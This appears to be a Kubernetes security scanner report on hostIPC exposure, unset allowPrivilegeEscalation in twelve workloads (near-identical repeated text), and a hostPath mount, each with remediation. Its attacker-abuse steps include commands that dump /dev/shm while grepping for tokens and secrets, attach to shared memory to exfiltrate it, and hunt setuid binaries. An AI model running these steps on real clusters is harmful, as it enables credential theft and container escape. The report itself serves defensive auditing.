The attack surface is data, not code execution. Many host-resident processes (caching layers, GPU compute via CUDA's cuMemAlloc, Redis with unixsocket, Postgres' shared buffers, even kernel-side IMA logs) store in-memory state in IPC segments under the assumption no untrusted process can address them. With hostIPC: true an attacker dumps every visible segment, harvests cached secrets, replays message queues, or corrupts semaphores to cause denial-of-service.

Bishop Fox's bad-pods/hostipc example uses ipcs -m to list shared-memory segments and ipcs -p to identify owning PIDs, then cat /dev/shm/* (or attaches via shmat) to extract their contents. hostIPC is forbidden by the Pod Security Standards Baseline level.

Impact Read or modify shared memory and SysV IPC of every process on the node; leak in-memory secrets, GPU buffers, database caches; denial-of-service via semaphore corruption.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
TechniqueContainer escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod with hostIPC enabled.
  2. Enumerate IPC: ipcs -a lists shared-memory IDs, message queues, and semaphores.
  3. Dump /dev/shm: ls -la /dev/shm; for f in /dev/shm/*; do strings "$f" | grep -iE 'token|secret|key'; done.
  4. Attach to a SysV segment with a small program (shmat(shmid, 0, SHM_RDONLY)) and exfiltrate.
  5. If a co-tenant runs an in-memory cache (Redis without disk persistence, an ML inference engine), extract model weights or session tokens still resident.
Remediation
Set hostIPC: false (default).
  1. Confirm no legitimate IPC sharing requirement; very few application workloads need this. Typically only NVIDIA GPU sharing or some HPC workloads.
  2. Remove hostIPC: true from the pod template.
  3. Where shared memory is a feature need (containers cooperating), use a single Pod with multiple containers and an emptyDir { medium: Memory } volume instead of host IPC.
  4. Validate: kubectl get deployment/host-ns-app -n vulnerable -o jsonpath='{.spec.template.spec.hostIPC}' is empty/false.
Evidence
hostIPCtrue
Shares the node's IPC namespace (reads other processes' shared memory)
Show raw JSON
{
  "hostIPC": true
}
HIGH

Container api allows privilege escalation in Deployment/flat-network/api

KUBE-PODSEC-APE-001 12 subjects Score 7.8
MITRE ATT&CK: T1548.001T1611

Affected subjects (12)

HIGH Deployment/flat-network/api Workload 7.8
Container api allows privilege escalation in Deployment/flat-network/api
Scope · Workload Workload Deployment/flat-network/api
Category: Privilege Escalation Resource: Deployment/flat-network/api Namespace: flat-network

Container api in Deployment/flat-network/api either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapi
Show raw JSON
{
  "container": "api"
}
HIGH DaemonSet/rbac-fixtures/daemon-app Workload 7.8
Container app allows privilege escalation in DaemonSet/rbac-fixtures/daemon-app
Scope · Workload Workload DaemonSet/rbac-fixtures/daemon-app, runs on every node (per-node blast radius)
Category: Privilege Escalation Resource: DaemonSet/rbac-fixtures/daemon-app Namespace: rbac-fixtures

Container app in DaemonSet/rbac-fixtures/daemon-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDaemonSet

A DaemonSet schedules one pod per node, typically for cluster infrastructure (CNI, log shipping, node monitoring). DaemonSets are frequent targets because they often need hostNetwork, hostPath, or privileged to do their job, which makes them ideal for attackers if compromised.

  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n rbac-fixtures -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/flat-network/unmatched Workload 7.8
Container app allows privilege escalation in Deployment/flat-network/unmatched
Scope · Workload Workload Deployment/flat-network/unmatched
Category: Privilege Escalation Resource: Deployment/flat-network/unmatched Namespace: flat-network

Container app in Deployment/flat-network/unmatched either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/ingress-only/ingress-app Workload 7.8
Container app allows privilege escalation in Deployment/ingress-only/ingress-app
Scope · Workload Workload Deployment/ingress-only/ingress-app
Category: Privilege Escalation Resource: Deployment/ingress-only/ingress-app Namespace: ingress-only

Container app in Deployment/ingress-only/ingress-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n ingress-only -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/rbac-fixtures/imp-app Workload 7.8
Container app allows privilege escalation in Deployment/rbac-fixtures/imp-app
Scope · Workload Workload Deployment/rbac-fixtures/imp-app
Category: Privilege Escalation Resource: Deployment/rbac-fixtures/imp-app Namespace: rbac-fixtures

Container app in Deployment/rbac-fixtures/imp-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n rbac-fixtures -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/rbac-fixtures/wildcard-app Workload 7.8
Container app allows privilege escalation in Deployment/rbac-fixtures/wildcard-app
Scope · Workload Workload Deployment/rbac-fixtures/wildcard-app
Category: Privilege Escalation Resource: Deployment/rbac-fixtures/wildcard-app Namespace: rbac-fixtures

Container app in Deployment/rbac-fixtures/wildcard-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n rbac-fixtures -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/generic-hostpath-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/generic-hostpath-app
Scope · Workload Workload Deployment/vulnerable/generic-hostpath-app
Category: Privilege Escalation Resource: Deployment/vulnerable/generic-hostpath-app Namespace: vulnerable

Container app in Deployment/vulnerable/generic-hostpath-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/host-ns-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/host-ns-app
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Container app in Deployment/vulnerable/host-ns-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/risky-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Container app in Deployment/vulnerable/risky-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/root-runner Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/root-runner
Scope · Workload Workload Deployment/vulnerable/root-runner
Category: Privilege Escalation Resource: Deployment/vulnerable/root-runner Namespace: vulnerable

Container app in Deployment/vulnerable/root-runner either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/socket-mounts-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/socket-mounts-app
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Container app in Deployment/vulnerable/socket-mounts-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerapp
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/local-path-storage/local-path-provisioner Workload 7.8
Container local-path-provisioner allows privilege escalation in Deployment/local-path-storage/local-path-provisioner
Scope · Workload Workload Deployment/local-path-storage/local-path-provisioner
Category: Privilege Escalation Resource: Deployment/local-path-storage/local-path-provisioner Namespace: local-path-storage

Container local-path-provisioner in Deployment/local-path-storage/local-path-provisioner either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n local-path-storage -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Containerlocal-path-provisioner
Show raw JSON
{
  "container": "local-path-provisioner"
}
HIGH

HostPath mount /tmp/data in Deployment/vulnerable/generic-hostpath-app

KUBE-HOSTPATH-001 1 subject Score 7.6
MITRE ATT&CK: T1611T1552.001T1083

Affected subject

HIGH Deployment/vulnerable/generic-hostpath-app Workload 7.6
HostPath mount /tmp/data in Deployment/vulnerable/generic-hostpath-app
Scope · Workload Workload Deployment/vulnerable/generic-hostpath-app
Category: Privilege Escalation Resource: Deployment/vulnerable/generic-hostpath-app Namespace: vulnerable

Workload Deployment/vulnerable/generic-hostpath-app mounts host path /tmp/data via volume tmp-data. Generic hostPath usage breaks the container abstraction: the pod is now coupled to a specific node's filesystem layout, bypasses CSI quota/encryption/snapshotting, and creates a path-dependent attack surface that varies with the path mounted.

Even "benign" paths can be dangerous. /proc exposes the host's process tree (modify /proc/sys/kernel/core_pattern for root via crash). /sys lets a writable mount enable cgroup-release-agent escapes (CVE-2022-0492). /dev shared with the host gives raw block-device access. /etc/kubernetes contains kubelet config and PKI on control-plane nodes.

Even a mount of /etc (read-only) leaks /etc/shadow, ssh host_keys, kubeadm config, and CNI tokens. Kubernetes Pod Security Standards forbid hostPath at Baseline because there is no safe whitelist.

Impact Variable but always elevated risk: at minimum exposes node-specific files; commonly leaks credentials or enables privilege escalation depending on the path.
